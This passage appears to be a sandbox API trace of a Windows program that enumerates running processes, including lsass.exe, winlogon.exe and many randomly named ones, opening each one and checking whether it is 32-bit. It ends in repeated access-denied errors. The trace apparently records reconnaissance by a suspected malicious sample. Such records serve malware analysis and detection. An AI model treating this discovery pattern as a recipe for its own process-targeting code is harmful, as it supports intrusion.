	[0072.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.103] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.103] CloseHandle (hObject=0x224) returned 1
	[0072.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.103] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.104] CloseHandle (hObject=0x224) returned 1
	[0072.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728878, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.104] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.104] CloseHandle (hObject=0x224) returned 1
	[0072.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.104] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.104] CloseHandle (hObject=0x224) returned 1
	[0072.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.104] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.104] CloseHandle (hObject=0x224) returned 1
	[0072.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.105] CloseHandle (hObject=0x224) returned 1
	[0072.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.105] CloseHandle (hObject=0x224) returned 1
	[0072.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.105] CloseHandle (hObject=0x224) returned 1
	[0072.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.105] CloseHandle (hObject=0x224) returned 1
	[0072.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.106] CloseHandle (hObject=0x224) returned 1
	[0072.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.106] CloseHandle (hObject=0x224) returned 1
	[0072.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.106] CloseHandle (hObject=0x224) returned 1
	[0072.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.107] CloseHandle (hObject=0x224) returned 1
	[0072.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.107] CloseHandle (hObject=0x224) returned 1
	[0072.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728958, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.107] CloseHandle (hObject=0x224) returned 1
	[0072.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.107] CloseHandle (hObject=0x224) returned 1
	[0072.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.107] CloseHandle (hObject=0x224) returned 1
	[0072.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.108] CloseHandle (hObject=0x224) returned 1
	[0072.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.108] CloseHandle (hObject=0x224) returned 1
	[0072.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728978, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.108] CloseHandle (hObject=0x224) returned 1
	[0072.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.108] CloseHandle (hObject=0x224) returned 1
	[0072.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.108] CloseHandle (hObject=0x224) returned 1
	[0072.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.109] CloseHandle (hObject=0x224) returned 1
	[0072.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e720, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.109] CloseHandle (hObject=0x224) returned 1
	[0072.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.109] CloseHandle (hObject=0x224) returned 1
	[0072.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.109] CloseHandle (hObject=0x224) returned 1
	[0072.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.110] CloseHandle (hObject=0x224) returned 1
	[0072.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.110] CloseHandle (hObject=0x224) returned 1
	[0072.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7288f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.110] CloseHandle (hObject=0x224) returned 1
	[0072.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.110] CloseHandle (hObject=0x224) returned 1
	[0072.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eb08, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.110] CloseHandle (hObject=0x224) returned 1
	[0072.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.111] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
	[0072.112] GetLastError () returned 0x5
